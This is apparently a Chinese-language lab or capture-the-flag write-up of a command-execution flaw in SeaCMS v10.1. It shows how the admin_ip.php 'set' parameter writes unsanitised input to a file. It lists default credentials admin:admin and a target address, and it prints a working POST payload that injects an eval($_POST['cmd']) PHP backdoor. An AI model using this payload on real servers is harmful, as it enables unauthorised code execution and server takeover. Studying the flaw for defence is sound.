1、产品简介
海洋CMS一套程序自适应电脑、手机、平板、APP多个终端入口。
2、漏洞概述
SeaCMS v10.1存在命令执行漏洞,在w1aqhp/admin_ip.php下第五行使用set参数,对用户输入没有进行任何处理,直接写入文件。攻击者可利用该漏洞执行恶意代码,获取服务器权限。
3、影响范围
v10.1
4、漏洞知识
1、审计
寻找用户可控参数,且存在对用户输入没有或处理不完全情况,直接写入文件,攻击者可利用该漏洞执行恶意代码,获取服务器权限。
2、环境
将php后门代码写入到是php的文件里面,然后再连接该php文件。
5、漏洞复现
1、开启靶场访问IP 后台路径:/manager 后台密码:admin:admin
2、点击系统---->后台ip安全设置 点击确认,并抓包
3、 POST提交的数据中写入后门连接代码 v=0&ip=+11111111111";eval($_POST['cmd']);//
4、访问写入的页面 http://123.58.224.8:44871/manager/admin_ip.php 回显正常
5、后门连接
6、获取flag